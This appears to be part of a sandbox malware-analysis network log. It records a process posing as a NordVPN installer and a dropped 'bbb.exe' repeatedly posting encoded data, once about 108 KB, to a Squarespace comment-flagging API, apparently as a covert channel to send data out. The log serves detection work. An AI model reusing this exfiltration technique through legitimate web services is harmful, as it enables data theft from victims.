2024-09-01 19:56:42 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:42 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:42 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:42 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:42 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:42 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BUrYhk5eDozaYmMxM2Q4YmFlODZkYTU5NjFkZGM4OTdiMjE0MjYw; Path=/; Secure Set-Cookie: crumb=BXImg-JF2g2ENGQxZDlkYzdkOGE2YzEyNDNhNzFkNmMwYTJjMGE1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 2v2I1iP6/6u9ap2x6 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXImg-JF2g2ENGQxZDlkYzdkOGE2YzEyNDNhNzFkNmMwYTJjMGE1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49835	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:42 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:42 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:42 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:42 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:42 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:42 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BV8V4x1QtbZTYjAwMDliYzM0MDEyN2M1MWM4YzZlMGNhMjE1OGY1; Path=/; Secure Set-Cookie: crumb=BXrQkov599LGYzM4NTJmOTY0YmIyOTYyMjdhZjdiNWM4OTUxZjIy; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 9uLaEZrz/dLrXqyWn Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXrQkov599LGYzM4NTJmOTY0YmIyOTYyMjdhZjdiNWM4OTUxZjIy"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49836	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:42 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:43 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:43 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:43 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:43 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BUMwCpERJbaZMWY5NjM3MzkxZWY2YTA4NWJjOTkyMTkyMTgxMDc0; Path=/; Secure Set-Cookie: crumb=BRXLA9prBNAAYjdjZDg5YjZkNzVkYWQwN2NhNGNjYzZhOWMxM2Qy; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: lW5gtndi/8BlyuRAe Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRXLA9prBNAAYjdjZDg5YjZkNzVkYWQwN2NhNGNjYzZhOWMxM2Qy"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49837	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:43 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:43 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:43 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:43 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:43 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZXcYvxbLpPANzllYWQ3MDlhZmMzNWE5MGRkYjQ1NjcyNjViNjI4; Path=/; Secure Set-Cookie: crumb=BZB_B90cDXw8YjJiNWI1NDQ3MzdhMmYyZDk4YzQ2ZDk2MDBiMmEx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: O1VPMhbm/I1tdMq1f Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZB_B90cDXw8YjJiNWI1NDQ3MzdhMmYyZDk4YzQ2ZDk2MDBiMmEx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49840	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:43 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:43 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:43 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:44 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:43 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXPOphW1tbe7MmQ1NTQwM2VkZWJmY2E2OTM1YjA4NmI5NzE3YzI4; Path=/; Secure Set-Cookie: crumb=BeCsFvDUbwHoYWEwMTc3NjE1ZTYyZGFhNGIwNDJkYjdmNGJhMDg2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: hLAtMrMD/eCNlhdIp Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeCsFvDUbwHoYWEwMTc3NjE1ZTYyZGFhNGIwNDJkYjdmNGJhMDg2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49842	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:43 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:56:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:43 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:43 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 7a 39 53 44 76 6d 61 74 62 53 47 58 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92Yz9SDvmatbSGXbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:43 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:43 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:43 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:43 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:43 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:43 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:43 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:56:43 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:56:44 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:43 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BT6v6tnlGapMNDgyYTY4MTkxZjgxNTQ3OTI3MzJmYzk1MjdhYmNl; Path=/; Secure Set-Cookie: crumb=BSUIdXwbbvHjYTMzNGE4NjU4YzExYTVjMjAwY2JmOGVlOGRhZWI5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Z1R7tbGr/V16vR1kg Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BSUIdXwbbvHjYTMzNGE4NjU4YzExYTVjMjAwY2JmOGVlOGRhZWI5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49843	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:47 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:47 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:47 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:47 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
